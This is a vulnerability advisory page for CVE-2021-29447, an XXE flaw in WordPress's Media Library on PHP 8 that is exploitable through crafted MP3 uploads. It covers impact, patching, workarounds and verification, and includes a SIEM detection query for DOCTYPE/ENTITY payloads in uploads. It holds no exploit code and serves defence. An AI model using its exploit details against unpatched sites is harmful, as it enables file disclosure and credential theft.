CVE-2021-29447 – WordPress users with file upload permissions (l... (How to Fix)

Q: What is the severity of CVE-2021-29447?

CVE-2021-29447 has a CVSS score of 7.1 (HIGH). WordPress users with file upload permissions (like Authors) can exploit an XML parsing vulnerability in the Media Library to perform XXE attacks when PHP 8 is used. This allows attackers to read internal files from the server. The vulnerability affects WordPress installations running PHP 8.

📋 TL;DR

WordPress users with file upload permissions (like Authors) can exploit an XML parsing vulnerability in the Media Library to perform XXE attacks when PHP 8 is used. This allows attackers to read internal files from the server. The vulnerability affects WordPress installations running PHP 8.

💻 Affected Systems

Products:

WordPress

Versions: All versions before 5.7.1 when running PHP 8

Operating Systems: All operating systems running PHP 8

Default Config Vulnerable: ⚠️ Yes

Notes: Only vulnerable when running PHP 8. PHP 7.x and earlier are not affected. Requires user with file upload capability (Author role or higher).

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server file disclosure including configuration files, database credentials, and sensitive system files leading to full system compromise.

🟠

Likely Case

Unauthorized access to sensitive WordPress files (wp-config.php), user data, and potentially other readable files on the web server.

🟢

If Mitigated

Limited impact with proper file permissions and network segmentation preventing access to critical system files.

🌐 Internet-Facing: HIGH - WordPress sites are typically internet-facing and attackers can exploit this if they gain author-level access.

🏢 Internal Only: MEDIUM - Internal WordPress instances could be exploited by malicious insiders or compromised accounts.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploit requires authenticated user with file upload permissions. Multiple public proof-of-concepts exist showing MP3 file upload exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: WordPress 5.7.1

Vendor Advisory: https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh

Restart Required: No

Instructions:

1. Update WordPress to version 5.7.1 or later via Dashboard > Updates. 2. For older versions, apply security patches from WordPress security releases. 3. Enable auto-updates for WordPress core.

🔧 Temporary Workarounds

Disable PHP 8

all

Revert to PHP 7.x which is not vulnerable to this specific XXE issue

Contact hosting provider to downgrade PHP version to 7.4 or earlier

Restrict file uploads

all

Remove file upload capabilities from Author roles and restrict to Administrators only

Use WordPress role management plugins or custom code to modify capabilities

🧯 If You Can't Patch

Implement strict file upload validation to block XML-based file types
Deploy WAF rules to detect and block XXE payloads in file uploads

🔍 How to Verify

Check if Vulnerable:

Check WordPress version (Dashboard > Updates) and PHP version (wp-admin/site-health.php or phpinfo()). If WordPress < 5.7.1 AND PHP version starts with 8.x, system is vulnerable.

Check Version:

wp core version (WP-CLI) or check Dashboard > Updates in WordPress admin

Verify Fix Applied:

Verify WordPress version is 5.7.1 or higher via Dashboard > Updates. Check that XML external entity processing is disabled in PHP configuration.

📡 Detection & Monitoring

Log Indicators:

Multiple failed MP3/XML file upload attempts
Unusual file uploads from Author-level users
HTTP requests with XML entities in file uploads

Network Indicators:

POST requests to /wp-admin/async-upload.php with XML content
File uploads containing DOCTYPE declarations or ENTITY definitions

SIEM Query:

source="wordpress.log" AND ("async-upload" OR "upload.php") AND ("DOCTYPE" OR "ENTITY" OR "SYSTEM")

📊 Metadata

CVE ID: CVE-2021-29447

CVSS v3 Score: 7.1 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

CWE: CWE-611

Published: April 15, 2021

Last Updated: November 21, 2024

🔗 References

http://packetstormsecurity.com/files/163148/XML-External-Entity-Via-MP3-File-Upload-On-WordPress.html Third Party Advisory,VDB Entry
http://packetstormsecurity.com/files/164198/WordPress-5.7-Media-Library-XML-Injection.html Exploit,Third Party Advisory,VDB Entry
https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/ Exploit,Third Party Advisory
https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh Third Party Advisory
https://lists.debian.org/debian-lts-announce/2021/04/msg00017.html Mailing List,Third Party Advisory
https://wordpress.org/news/category/security/ Release Notes,Vendor Advisory
https://www.debian.org/security/2021/dsa-4896 Third Party Advisory
http://packetstormsecurity.com/files/163148/XML-External-Entity-Via-MP3-File-Upload-On-WordPress.html Third Party Advisory,VDB Entry
http://packetstormsecurity.com/files/164198/WordPress-5.7-Media-Library-XML-Injection.html Exploit,Third Party Advisory,VDB Entry
https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/ Exploit,Third Party Advisory
https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh Third Party Advisory
https://lists.debian.org/debian-lts-announce/2021/04/msg00017.html Mailing List,Third Party Advisory
https://wordpress.org/news/category/security/ Release Notes,Vendor Advisory
https://www.debian.org/security/2021/dsa-4896 Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-29447, you might also want to check these: